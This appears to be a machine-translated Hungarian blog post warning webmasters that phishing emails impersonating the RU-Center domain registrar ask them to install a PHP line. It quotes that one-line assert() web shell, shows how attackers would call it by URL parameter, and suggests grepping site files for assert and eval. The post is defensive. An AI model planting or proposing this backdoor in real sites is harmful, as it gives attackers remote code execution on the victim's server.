A tetejére

Publikáció a közösségben "X Networks - 1. számú informatikai aggregátor"

Ez egy automatikus fordítás.
Ide kattintva elolvashatja a kiadványt az eredeti nyelven.

Ma néhány barátom levelet kapott, állítólag a RU -Center -től (a legnagyobb orosz domain névregisztrátor) - nic.ru, a következő tartalommal:

A leveleket az info@nic.technical címről küldtük . A levélben a támadók, akik a VV-Központ nevében képviseltetik magukat, javasolják a következő kód elhelyezését a webhelyen:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Sajnos sok kollégánk, akik "webmestereknek" nevezik magukat (számos webhelytulajdonos), nem ismerik a PHP -t, és nem gondolnak a fenti kód veszélyeire. Ha egy karakterláncot ad át paraméterként ennek a függvénynek, akkor azt az assert () PHP kódnak tekinti! Legyen óvatos!

Javaslom, hogy az assert vagy az eval parancsok segítségével vizsgálja meg a php -projektjeiben a sebezhetőséget. Ha ezek a parancsok megtalálhatók a projekt kódjában, ne essen pánikba - tanulmányozza az algoritmusukat. Az algoritmusok engedélyezett használata teljesen lehetséges. Abban az esetben, a fenti példában a parancs lehetővé teszi, hogy a támadók, hogy hívja a webhely, például a RUCENTER paraméter - http://sistema-audit.ru/?RUCENTER=PHP-code

Javasoljuk, hogy végezzen keresést például a grep -i -r 'assert' / home / www / mysite / * linux paranccsal, amely a webhelyfájlokat tartalmazó mappát jelzi, hogy megkapja a gyanús fájlok listáját. példány a használt kód.

Vigyázzon magára és webhelyeire!

Ez egy automatikus fordítás.
Ide kattintva elolvashatja a kiadványt az eredeti nyelven.